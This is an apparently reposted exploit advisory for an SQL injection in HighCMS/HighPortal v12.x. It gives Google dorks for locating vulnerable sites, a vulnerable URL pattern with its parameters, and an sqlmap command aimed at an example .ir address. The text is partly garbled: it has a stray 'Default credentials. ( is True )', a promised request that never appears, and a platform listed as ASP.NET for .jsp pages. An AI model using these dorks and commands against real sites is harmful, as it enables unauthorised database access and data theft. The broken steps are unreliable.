Share
## https://sploitus.com/exploit?id=PACKETSTORM:167170
# Exploit Title: HighCMS/HighPortal v12.x SQL Inj  
# Type : WEBAPPS "HighCMS/HighPortal"  
# Platform : ASP.NET  
# Date : 4/23/2022  
# Exploit Author : E1.Coders  
# Software Link : https://aryanic.com/page/portal  
# Version : v12.x  
# Category : Webapps  
# Tested on: Linux/Windows  
# Google Dork: inurl:index.jsp?siteid=1&fkeyid=&siteid=1&pageid=  
  
# Google Dork: <ยฉ2022 HighCMS/HighPortal"  
  
Step 1: Enter the address of the "page" that has the problem of sql injection attacks   
http: //TARGET/index.jsp? Siteid = 1 & fkeyid = & siteid = 1 & pageid = 6528 Default credentials. ( is True )  
STEP 2 : Send the following request "  
or  
Use sqlmap : python sqlmap.py -u "https://example.ir/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=11211"